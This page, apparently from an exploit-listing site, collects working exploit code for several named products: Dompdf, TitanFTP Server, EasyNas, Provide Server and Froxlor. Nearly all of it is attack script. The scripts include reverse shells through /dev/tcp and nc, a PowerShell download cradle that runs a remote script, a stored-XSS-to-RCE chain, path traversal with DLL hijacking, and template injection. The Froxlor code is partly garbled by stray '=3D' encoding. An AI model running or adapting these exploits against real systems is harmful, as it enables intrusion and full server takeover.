Latest exploits :: CodePwn

<pre><code>#!/usr/bin/python3 # Exploit Title: Dompdf 1.2.1 - Remote Code Execution (RCE) # Date: 16 February 2023 # Exploit Author: Ravindu Wickramasinghe (@rvizx9) # Vendor Homepage: https://dompdf.github.io/ # Software Link: https://github.com/dompdf/dompdf # Version: <1.2.1 # Tested on: Kali linux # CVE : CVE-2022-28368 # Github Link : https://github.com/rvizx/CVE-2022-28368 import subprocess import re import os import sys import curses import requests import base64 import argparse import urllib.parse from urllib.parse import urlparse def banner(): print(''' \033[2mCVE-2022-28368\033[0m - Dompdf RCE\033[2m PoC Exploit \033[0mRavindu Wickramasinghe\033[2m | rvz - @rvizx9 https://github.com/rvizx/\033[0mCVE-2022-28368 ''') exploit_font = b"AAEAAAAKAO+/vQADACBkdW0xAAAAAAAAAO+/vQAAAAJjbWFwAAwAYAAAAO+/vQAAACxnbHlmNXNj77+9AAAA77+9AAAAFGhlYWQH77+9UTYAAADvv70AAAA2aGhlYQDvv70D77+9AAABKAAAACRobXR4BEQACgAAAUwAAAAIbG9jYQAKAAAAAAFUAAAABm1heHAABAADAAABXAAAACBuYW1lAEQQ77+9AAABfAAAADhkdW0yAAAAAAAAAe+/vQAAAAIAAAAAAAAAAQADAAEAAAAMAAQAIAAAAAQABAABAAAALe+/ve+/vQAAAC3vv73vv73vv73vv70AAQAAAAAAAQAKAAAAOgA4AAIAADMjNTowOAABAAAAAQAAF++/ve+/vRZfDzzvv70ACwBAAAAAAO+/vRU4BgAAAADvv70m270ACgAAADoAOAAAAAYAAQAAAAAAAAABAAAATO+/ve+/vQASBAAACgAKADoAAQAAAAAAAAAAAAAAAAAAAAIEAAAAAEQACgAAAAAACgAAAAEAAAACAAMAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEADYAAwABBAkAAQACAAAAAwABBAkAAgACAAAAAwABBAkAAwACAAAAAwABBAkABAACAAAAcwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==" def get_ip_addresses(): output = subprocess.check_output(['ifconfig']).decode() ip_pattern = r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}' ip_addresses = re.findall(ip_pattern, output) ip_addresses = [ip for ip in ip_addresses if not ip.startswith('255')] ip_addresses = list(set(ip_addresses)) ip_addresses.insert(0, 'localhost') return ip_addresses def choose_ip_address(stdscr, ip_addresses): curses.curs_set(0) curses.noecho() stdscr.keypad(True) current_row = 0 num_rows = len(ip_addresses) stdscr.addstr("[ins]: please select an ip address, use up and down arrow keys, press enter to select.\n\n") while True: stdscr.clear() stdscr.addstr("[ins]: please select an ip address, use up and down arrow keys, press enter to select.\n\n") for i, ip_address in enumerate(ip_addresses): if i == current_row: stdscr.addstr(ip_address, curses.A_REVERSE) else: stdscr.addstr(ip_address) stdscr.addstr("\n") key = stdscr.getch() if key == curses.KEY_UP and current_row > 0: current_row -= 1 elif key == curses.KEY_DOWN and current_row < num_rows - 1: current_row += 1 elif key == curses.KEY_ENTER or key in [10, 13]: return ip_addresses[current_row] def help(): print(''' usage: ./dompdf-rce --inject <css-inject-endpoint> --dompdf <dompdf-instance> example: ./dompdf-rce --inject https://vuln.rvz/dev/convert-html-to-pdf?html= --dompdf https://vuln.rvz/dompdf/ notes: - Provide the parameters in the URL (regardless the request method) - Known Issues! - Testing with https://github.com/positive-security/dompdf-rce The program has been successfully tested for RCE on some systems where dompdf was implemented, But there may be some issues when testing with the dompdf-rce PoC at https://github.com/positive-security/dompdf-rce due to a known issue described at https://github.com/positive-security/dompdf-rce/issues/2. In this application, the same implementation was added for now. Although it may be pointless at the moment, you can still manually add the payload by copying the exploit_font.php file to ../path-to-dompdf-rce/dompdf/applicaiton/lib/fonts/exploitfont_normal_3f83639933428d70e74a061f39009622.php - more : https://www.cve.org/CVERecord?id=CVE-2022-28368 ''') sys.exit() def check_url(url): regex = re.compile( r'^(?:http|ftp)s?://' r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|' r'localhost|' r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})' r'(?::\d+)?' r'(?:/?|[/?]\S+)$', re.IGNORECASE) if not re.match(regex, url): print(f"\033[91m[err]:\033[0m {url} is not a valid url") return False else: return True def final_param(url): query_start = url.rfind('?') if query_start == -1: query_start = url.rfind('&') if query_start == -1: return None query_string = url[query_start+1:] for param in reversed(query_string.split('&')): if '=' in param: name = param.split('=')[0] if name: return name return None if __name__ == '__main__': banner() ports = ['9001', '9002'] for port in ports: try: processes = subprocess.check_output(["lsof", "-i", "TCP:9001-9002"]).decode("utf-8") for line in processes.split("\n"): if "LISTEN" in line: pid = line.split()[1] port = line.split()[8].split(":")[1] if port == "9001" or port == "9002": os.system("kill -9 {}".format(pid)) print(f'\033[94m[inf]:\033[0m processes running on port {port} have been terminated') except: pass if len(sys.argv) == 1: print("\033[91m[err]:\033[0m no endpoints were provided. try --help") sys.exit(1) elif sys.argv[1] == "--help" or sys.argv[1] == "-h": help() elif len(sys.argv) > 1: parser = argparse.ArgumentParser(description='',add_help=False, usage="./dompdf-rce --inject <css-inject-endpoint/file-with-multiple-endpoints> --dompdf <dompdf-instance-endpoint>") parser.add_argument('--inject', type=str, help='[info] provide the url of the css inject endpoint', required=True) parser.add_argument('--dompdf', type=str, help='[info] provide the url of the dompdf instance', required=True) args = parser.parse_args() injectpoint = args.inject dompdf_url = args.dompdf if not check_url(injectpoint) and (not check_url(dompdf_url)): sys.exit() param=final_param(injectpoint) if param == None: print("\n\033[91m[err]: no parameters were provided! \033[0mnote: provide the parameters in the url (--inject-css-endpoint url?param=) ") sys.exit() ip_addresses = get_ip_addresses() sip = curses.wrapper(choose_ip_address, ip_addresses) print(f'\033[94m[inf]:\033[0m selected ip address: {sip}') shell = '''<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/'''+sip+'''/9002 0>&1'");?>''' print("\033[94m[inf]:\033[0m using payload: " +shell) print("\033[94m[inf]:\033[0m generating exploit.css and exploit_font.php files...") decoded_data = base64.b64decode(exploit_font).decode('utf-8') decoded_data += '\n' + shell css = ''' @font-face { font-family:'exploitfont'; src:url('http://'''+sip+''':9001/exploit_font.php'); font-weight:'normal'; font-style:'normal'; } ''' with open("exploit.css","w") as f: f.write(css) with open("exploit_font.php","w") as f: f.write(decoded_data) print("\033[94m[inf]:\033[0m starting http server on port 9001..") http_server = subprocess.Popen(['python', '-m', 'http.server', '9001']) url = "http://"+sip+":9001/exploit_font.php" echo_output = subprocess.check_output(['echo', '-n', url.encode()]) md5sum_output = subprocess.check_output(['md5sum'], input=echo_output) md5_hash = md5sum_output.split()[0].decode() print("\033[94m[inf]:\033[0m url hash: "+md5_hash) print("\033[94m[inf]:\033[0m filename: exploitfont_normal_"+md5_hash+".php") print("\033[94m[inf]:\033[0m sending the payloads..\n") url = injectpoint if url.endswith("/"): url = url[:-1] headers = { 'Host': urlparse(injectpoint).hostname, 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Connection': 'close', 'Upgrade-Insecure-Requests': '1', 'Content-Type': 'application/x-www-form-urlencoded', } payload="<link rel=stylesheet href=\'http://"+sip+":9001/exploit.css\'>" data = '{\r\n"'+param+'": "'+payload+'"\r\n}' try: response1 = requests.get(url+urllib.parse.quote(payload),headers=headers,) response2 = requests.post(url, headers=headers, data=data, verify=False) except: print("\033[91m[err]:\033[0m failed to send the requests! check connection to the host") sys.exit() if response1.status_code == 200 or response2.status_code == 200: print("\n\033[92m[inf]: success!\033[0m \n\033[94m[inf]:\033[0m url: "+url+" - status_code: 200") else: print("\n\033[91m[err]: failed to send the exploit.css!\033[0m \n\033[94m[inf]:\033[0m url: "+url+" - status_code: "+str(response1.status_code)+","+str(response2.status_code)) print("\033[94m[inf]:\033[0m terminating the http server..") http_server.terminate() print("\033[93m[ins]:\033[0m start a listener on port 9002 (execute the command on another terminal and press enter)") print("\nnc -lvnp 9002") input("\n\033[93m[ins]:\033[0m press enter to continue!") print("\033[93m[ins]:\033[0m check for connections!") del headers['Content-Type'] url = dompdf_url if url.endswith("/"): url = url[:-1] url+="/lib/fonts/exploitfont_normal_"+md5_hash+".php" response = requests.get( url, headers=headers, verify=False, ) if response.status_code == 200: print("\n\033[92m[inf]: success!\033[0m \n\033[94m[inf]:\033[0m url: "+url+" - status_code: "+str(response.status_code)) else: print("\n\033[91m[err]: failed to trigger the payload! \033[0m \n\033[94m[inf]:\033[0m url: "+url+" - status_code: "+str(response.status_code)) print("\033[94m[inf]:\033[0m process complete!") </code></pre>

<pre><code>Titan FTP Server Path Traversal Vulnerability in move-file Function Version: < 2.0.1.2102 CVE-2023-22629 CWE-24: Path Traversal TitanFTP Server is vulnerable to a path traversal attack in the move-file function. An attacker can exploit this vulnerability by providing a specially crafted newPath parameter that contains directory traversal sequences (e.g., '../') to move a file to a directory outside the intended directory. This can allow an attacker to access sensitive files and execute arbitrary code. The vulnerability exists because the server does not properly validate the user-supplied newPath parameter. As a result, an attacker can send a request with the malicious parameter to bypass the intended directory and access unauthorized files. This is an authenticated exploit. An attacker would need a user account on the TitanFTP server, to upload the files. CWE-427: Uncontrolled Search Path Element The service-application is vulnerable to a DLL search order hijack. It is importing several Windows DLL-files, like version.dll. By placing a proxy-DLL named version.dll exploiting the path traversal vulnerability, this DLL will proxy imports to the original version.dll also uploaded in the application directory, with the name version32.dll, one will gain Remote Code Execution on the server as NT System. Exploit code Using this batchfile, an authenticated attacker can upload 2 dll-files, doing DLL-Hijack by proxy. In this poc, I am uploading a reverse-shell DLL-File, named version.dll, that proxies exports to the original version.dll, here named version32.dll. #!/bin/bash url="http://192.168.16.226" user="me" pass="me" proxydll="version.dll" orig_dll="version32.dll" host=$(echo -n $url|cut -d/ -f 3) auth=$(curl -s -k -X POST -H "Host: $host" -H "No-Auth-Challenge: true" -H "User-Agent: Nah" -H "content-type: application/json" -H "Accept: */*" -H "Origin:$url" -H "Referer: $url" -H "Accept-Encoding: gzip, deflate" -H "Accept-Language: en-US,en;q=0.9,nb;q=0.8,no;q=0.7,en-GB;q=0.6" -H "Connection: close" -d "{\"user\":\"$user\",\"pass\":\"$pass\",\"ticket\":null,\"showEULA\":false}" "$url/WebApi/Login") SessionId=$(echo -n $auth |jq .auth.SessionId) SessionId=$(echo -n "${SessionId//\"}") ServerGUID=$(echo -n $auth |jq .auth.ServerGUID) ServerGUID=$(echo -n "${ServerGUID//\"}") #Uploading files curl -i -s -k -v -X POST -H "User-Agent: Nah" -H 'No-Auth-Challenge: true' -H 'enctype: multipart/form-data' -H "SRTSessionId: $SessionId" -F "request={\"Model\":\"MxUtilFileAction\",\"ServerGUID\":\"$ServerGUID\",\"Action\":\"l\",\"SRTSessionId\":\"$SessionId\",\"Ticket\":null,\"Data\":{\"action\":\"uc\",\"chunkData\":{\"UploadUid\":\"935ee903-2f65-442a-8a0b-1b23d12537c5\",\"FileName\":\"$proxydll\",\"RelativeFullPath\":\"/$proxydll\",\"ContentType\":\"contenttype\",\"ChunkIndex\":0,\"ChunkSize\":2,\"TotalChunks\":1,\"TotalFileSize\":19456,\"Overwrite\":true},\"domainData\":false,\"domainLogs\":false,\"SRTSessionId\":\"$SessionId\"}}" -F "chunk=@$proxydll;filename=blob;type=application/octet-stream" $url/WebApi/ProcessWithChunk curl -i -s -k -v -X POST -H "User-Agent: Nah" -H 'No-Auth-Challenge: true' -H 'enctype: multipart/form-data' -H "SRTSessionId: $SessionId" -F "request={\"Model\":\"MxUtilFileAction\",\"ServerGUID\":\"$ServerGUID\",\"Action\":\"l\",\"SRTSessionId\":\"$SessionId\",\"Ticket\":null,\"Data\":{\"action\":\"uc\",\"chunkData\":{\"UploadUid\":\"935ee903-2f65-442a-8a0b-1b23d12537c5\",\"FileName\":\"$orig_dll\",\"RelativeFullPath\":\"/$orig_dll\",\"ContentType\":\"contenttype\",\"ChunkIndex\":0,\"ChunkSize\":2,\"TotalChunks\":1,\"TotalFileSize\":19456,\"Overwrite\":true},\"domainData\":false,\"domainLogs\":false,\"SRTSessionId\":\"$SessionId\"}}" -F "chunk=@$orig_dll;filename=blob;type=application/octet-stream" $url/WebApi/ProcessWithChunk #Moving them into c:\Program Files\South River Technologies\srxserver\" curl -i -s -k -X POST -H "No-Auth-Challenge: true" -H "SRTSessionId: $SessionId" -H "User-Agent: Nah" -H "content-type: application/json" -H "Accept: */*" -H "Origin: $url" -H "Referer: $url/" -H "Accept-Encoding: gzip, deflate" -H "Accept-Language: en-US,en;q=0.9,nb;q=0.8,no;q=0.7,en-GB;q=0.6" -H "Connection: close" -d "[{\"Model\":\"MxUtilFileAction\",\"ServerGUID\":\"$ServerGUID\",\"Action\":\"l\",\"disableErrorSnackBar\":true,\"Data\":{\"action\":\"mv\",\"path\":\"/$proxydll\",\"newPath\":\"/../../../../../../../Program Files/South River Technologies/srxserver/$proxydll\",\"domainData\":false,\"domainLogs\":false,\"SRTSessionId\":\"$SessionId\"},\"SRTSessionId\":\"$SessionId\"}]" "$url/WebApi/Process" curl -i -s -k -X POST -H "No-Auth-Challenge: true" -H "SRTSessionId: $SessionId" -H "User-Agent: Nah" -H "content-type: application/json" -H "Accept: */*" -H "Origin: $url" -H "Referer: $url/" -H "Accept-Encoding: gzip, deflate" -H "Accept-Language: en-US,en;q=0.9,nb;q=0.8,no;q=0.7,en-GB;q=0.6" -H "Connection: close" -d "[{\"Model\":\"MxUtilFileAction\",\"ServerGUID\":\"$ServerGUID\",\"Action\":\"l\",\"disableErrorSnackBar\":true,\"Data\":{\"action\":\"mv\",\"path\":\"/$orig_dll\",\"newPath\":\"/../../../../../../../Program Files/South River Technologies/srxserver/$orig_dll\",\"domainData\":false,\"domainLogs\":false,\"SRTSessionId\":\"$SessionId\"},\"SRTSessionId\":\"$SessionId\"}]" "$url/WebApi/Process" </code></pre>

<pre><code># Exploit Title: EasyNas 1.1.0 - OS Command Injection # Date: 2023-02-9 # Exploit Author: Ivan Spiridonov (ivanspiridonov@gmail.com) # Author Blog: https://xbz0n.medium.com # Version: 1.0.0 # Vendor home page : https://www.easynas.org # Authentication Required: Yes # CVE : CVE-2023-0830 #!/usr/bin/python3 import requests import sys import base64 import urllib.parse import time from requests.packages.urllib3.exceptions import InsecureRequestWarning # Disable the insecure request warning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) if len(sys.argv) < 6: print("Usage: ./exploit.py http(s)://url username password listenerIP listenerPort") sys.exit() url = sys.argv[1] user = sys.argv[2] password = sys.argv[3] # Create the payload payload = "/bin/sh -i >& /dev/tcp/{}/{} 0>&1".format(sys.argv[4], sys.argv[5]) # Encode the payload in base64 payload = base64.b64encode(payload.encode()).decode() # URL encode the payload payload = urllib.parse.quote(payload) # Create the login data login_data = { 'usr':user, 'pwd':password, 'action':'login' } # Create a session session = requests.Session() # Send the login request print("Sending login request...") login_response = session.post(f"https://{url}/easynas/login.pl", data=login_data, verify=False) # Check if the login was successful if 'Login to EasyNAS' in login_response.text: print("Unsuccessful login") sys.exit() else: print("Login successful") # send the exploit request timeout = 3 try: exploit_response = session.get(f'https://{url}/easynas/backup.pl?action=backup&menu=none&.submit=Backup&name=%7cecho+{payload}+%7c+base64+-d+%7c+sudo+sh+%7c%7ca+%23', headers={'User-Agent':'Mozilla/5.0 Gecko/20100101 Firefox/72.0'}, timeout = timeout, verify=False) if exploit_response.status_code != 200: print("[+] Everything seems ok, check your listener.") else: print("[-] Exploit failed, system is patched or credentials are wrong.") except requests.exceptions.ReadTimeout: print("[-] Everything seems ok, check your listener.") sys.exit() </code></pre>

<pre><code>Provide Server v. 14.4 CVE-2023-23286 Vulnerabilities: CWE-79: Improper Neutralization of Input During Web Page Generation Unauthenticated stored XSS in server-log delivered via username field from login-form CWE-352: Cross-Site Request Forgery CSRF-token exposed in javascript, making it possible to obtain a valid CSRF-Token and use it in XMLHTTPRequests. This vulnerability allows an attacker to add a task that runs commands on the server as "NT-System" Impact: An attacker could exploit the unauthenticated stored XSS vulnerability by injecting malicious code into the login form's username field. When the server-log is viewed, the malicious code will be executed, potentially allowing the attacker to steal user data or execute further attacks. By exploiting the CSRF vulnerability, an attacker could add a task to the server that runs commands with NT-System privileges. This could potentially allow the attacker to take complete control of the server, access sensitive data, or disrupt service. Proof Of Consept RCE via XSS and CSRF The attacker places the staged XSS into the username field and sends the login request. This will place the XSS stager in the server log and trigger when a administrator opens the log. The XSS stager downloads and runs the XSS payload. The payload will add a task that runs the powershell downloadcradle every time someone connects to the server. Even unauthenticated connections. The powershell-script downloaded in this example is a reverse shell, connecting back to the attacker. As the task runs as NT System on the server, the attacker will have full controll on the server. Powershell Downloadcradle PowerShell -noprofile -executionpolicy bypass "Start-process powershell.exe -argumentlist '-window hidden -noexit Start-Job { IEX(IWR https://example.com/rev.ps1 -UseBasicParsing) }'";exit Staged XSS <img id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vZXhhbXBsZS5jb20veHNzLmpzIjtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw src=https://example.com/1 onload=eval(atob(this.id))> XSS payload var vhost = window.location.protocol+'\/\/'+window.location.host var csrf_token = document.querySelector("meta[name='csrf-token']").getAttribute("content") , o = XMLHttpRequest.prototype.open; XMLHttpRequest.prototype.open = function(a, b) { var c = o.apply(this, arguments); return (b.startsWith("/") || b.startsWith(window.location.origin)) && this.setRequestHeader("X-CSRF-Token", csrf_token), c } fetch(vhost+'/ajax/SetEventsAndMessages',{ method: 'POST', headers: { 'Content-Length': '3845', 'Sec-Ch-Ua': '"Not?A_Brand";v="8", "Chromium";v="108", "Microsoft Edge";v="108"', 'X-Csrf-Token': csrf_token, 'Sec-Ch-Ua-Mobile': '?0', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.54', 'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8', 'Accept': 'application/json, text/javascript, */*; q=0.01', 'X-Requested-With': 'XMLHttpRequest', 'Sec-Ch-Ua-Platform': '"macOS"', 'Origin': vhost, 'Sec-Fetch-Site': 'same-origin', 'Sec-Fetch-Mode': 'cors', 'Sec-Fetch-Dest': 'empty', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'en-US,en;q=0.9,nb;q=0.8,no;q=0.7,en-GB;q=0.6', 'Connection': 'close' }, credentials: 'include', body: '%7B%22MsgOnCreateDirectory%22:%7B%22ShowScript%22:false,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Requested+file+action+okay,+completed.%22%7D,%22MsgOnUploadStart%22:%7B%22ShowScript%22:false,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22File+status+okay;+about+to+open+data+connection.%22%7D,%22MsgOnUploadEnd%22:%7B%22ShowScript%22:false,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Closing+data+connection.%22%7D,%22MsgOnDownloadEnd%22:%7B%22ShowScript%22:false,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Closing+data+connection.%22%7D,%22MsgOnRemoveDirectory%22:%7B%22ShowScript%22:false,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Requested+file+action+okay,+completed.%22%7D,%22MsgBeforeCreateDirectory%22:%7B%22ShowScript%22:true,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Access+denied%22%7D,%22MsgBeforeRename%22:%7B%22ShowScript%22:true,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Access+denied%22%7D,%22MsgBeforeRemoveDirectory%22:%7B%22ShowScript%22:true,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Access+denied%22%7D,%22MsgOnQuit%22:%7B%22ShowScript%22:false,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Goodbye.%22%7D,%22MsgOnCopy%22:%7B%22ShowScript%22:false,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Requested+file+action+okay,+completed.%22%7D,%22MsgOnDownloadStart%22:%7B%22ShowScript%22:false,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22File+status+okay;+about+to+open+data+connection.%22%7D,%22MsgBeforeUpload%22:%7B%22ShowScript%22:true,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Access+denied%22%7D,%22MsgOnListDirectoryEnd%22:%7B%22ShowScript%22:false,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Closing+data+connection.%22%7D,%22MsgBeforeLoggedIn%22:%7B%22ShowScript%22:true,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Login+not+accepted%22%7D,%22MsgOnRename%22:%7B%22ShowScript%22:false,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Requested+file+action+okay,+completed.%22%7D,%22MsgBeforeConnect%22:%7B%22ShowScript%22:true,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Not+connected,+access+denied.+Please+don\'t+hammer.%22%7D,%22MsgBeforeDownload%22:%7B%22ShowScript%22:true,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Access+denied%22%7D,%22MsgOnChangeDirectory%22:%7B%22ShowScript%22:false,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22CWD+Command+successful.%22%7D,%22MsgOnConnect%22:%7B%22ShowScript%22:false,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22%25EXECUTE(PowerShell++-noprofile+-executionpolicy+bypass+%5C%22Start-process+powershell.exe+-argumentlist+\'-window+hidden+-noexit+Start-Job+-ScriptBlock+%7B+IEX(IWR+https://example.com/rev.ps1+-UseBasicParsing)+%7D\'%5C%22;exit)%25%22%7D,%22MsgOnListDirectoryStart%22:%7B%22ShowScript%22:false,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Opening+connection+for+/bin/ls.%22%7D,%22MsgBeforeRemoveFile%22:%7B%22ShowScript%22:true,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Access+denied%22%7D,%22MsgBeforeChangeDirectory%22:%7B%22ShowScript%22:true,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Access+denied%22%7D,%22MsgOnDisconnect%22:%7B%22ShowScript%22:false,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22%22%7D,%22MsgOnRemoveFile%22:%7B%22ShowScript%22:false,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Requested+file+action+okay,+completed.%22%7D,%22MsgBeforeCopy%22:%7B%22ShowScript%22:true,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Access+denied%22%7D,%22MsgBeforeListDirectory%22:%7B%22ShowScript%22:true,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Access+denied%22%7D,%22MsgOnLoggedIn%22:%7B%22ShowScript%22:false,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22User+logged+in,+proceed.%22%7D%7D' }); window.location.href = vhost; fetch(vhost.replace(':8443','')) Bash script for running exploit #!/bin/bash echo "Sending payload" host=$1 if [ "$2" == "trigger" ] then curl -s -k https://$1 >/dev/null else curl -i -s -k $'POST' -H $host -H $'Content-Length: 262' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-Mode: navigate' -H $'Sec-Fetch-User: ?1' -H $'Sec-Fetch-Dest: document' -H "Referer: https://$host" -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-US,en;q=0.9,nb;q=0.8,no;q=0.7,en-GB;q=0.6' -H $'Connection: close' --data-binary $'path=%2F&username=%3Cimg+id%3DdmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vZjIwLmJlL2FsZXJ0Mi5qcyI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs%3D+src%3Dhttps%3A%2F%2Ff20.be%2F1+onload%3Deval%28atob%28this.id%29%29%3E&password=&logon=Log+in' "https://$host" > /dev/null clear fi echo "Waiting..." rlwrap nc -lvnp 5555 </code></pre>

<pre><code>#!/usr/bin/python3 # Exploit Title: Froxlor 2.0.3 Stable - Remote Code Execution (RCE) # Date: 2023-01-08 # Exploit Author: Askar (@mohammadaskar2) # CVE: CVE-2023-0315 # Vendor Homepage: https://froxlor.org/ # Version: v2.0.3 # Tested on: Ubuntu 20.04 / PHP 8.2 import telnetlib import requests import socket import sys import warnings import random import string from bs4 import BeautifulSoup from urllib.parse import quote from threading import Thread warnings.filterwarnings("ignore", category=3DUserWarning, module=3D'bs4') if len(sys.argv) !=3D 6: print("[~] Usage : ./froxlor-rce.py url username password ip port") exit() url =3D sys.argv[1] username =3D sys.argv[2] password =3D sys.argv[3] ip =3D sys.argv[4] port =3D sys.argv[5] request =3D requests.session() def login(): login_info =3D { "loginname": username, "password": password, "send": "send", "dologin": "" } login_request =3D request.post(url+"/index.php", login_info, allow_redi= rects=3DFalse) login_headers =3D login_request.headers location_header =3D login_headers["Location"] if location_header =3D=3D "admin_index.php": return True else: return False def change_log_path(): change_log_path_url =3D url + "/admin_settings.php?page=3Doverview&part= =3Dlogging" csrf_token_req =3D request.get(change_log_path_url) csrf_token_req_response =3D csrf_token_req.text soup =3D BeautifulSoup(csrf_token_req_response, "lxml") csrf_token =3D (soup.find("meta", {"name":"csrf-token"})["content"]) print("[+] Main CSRF token retrieved %s" % csrf_token) multipart_data =3D { "logger_enabled": (None, "0"), "logger_enabled": (None, "1"), "logger_severity": (None, "2"), "logger_logtypes[]": (None, "file"), "logger_logfile": (None, "/var/www/html/froxlor/templates/Froxlor/f= ooter.html.twig"), "logger_log_cron": (None, "0"), "csrf_token": (None, csrf_token), "page": (None, "overview"), "action": (None, ""), "send": (None, "send") =20 } req =3D request.post(change_log_path_url, files=3Dmultipart_data) response =3D req.text if "The settings have been successfully saved." in response: print("[+] Changed log file path!") return True else: return False def inject_template(): admin_page_path =3D url + "/admin_index.php" csrf_token_req =3D request.get(admin_page_path) csrf_token_req_response =3D csrf_token_req.text soup =3D BeautifulSoup(csrf_token_req_response, "lxml") csrf_token =3D (soup.find("meta", {"name":"csrf-token"})["content"]) onliner =3D "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {0} = {1} >/tmp/f".format(ip, port) payload =3D "{{['%s']|filter('exec')}}" % onliner data =3D { "theme": payload, "csrf_token": csrf_token, "page": "change_theme", "send": "send", "dosave": "", } req =3D request.post(admin_page_path, data, allow_redirects=3DFalse) try: location_header =3D req.headers["Location"] if location_header =3D=3D "admin_index.php": print("[+] Injected the payload sucessfully!") except: print("[-] Can't Inject payload :/") exit() handler_thread =3D Thread(target=3Dconnection_handler, args=3D(port,)) handler_thread.start() print("[+] Triggering the payload ...") req2 =3D request.get(admin_page_path) def connection_handler(port): print("[+] Listener started on port %s" % port) t =3D telnetlib.Telnet() s =3D socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind(("0.0.0.0", int(port))) s.listen(1) conn, addr =3D s.accept() print("[+] Connection received from %s" % addr[0]) t.sock =3D conn print("[+] Heads up, incoming shell!!") t.interact() if login(): print("[+] Successfully Logged in!") index_url =3D url + "/admin_index.php" request.get(index_url) if change_log_path(): inject_template() else: print("[-] Can't login") </code></pre>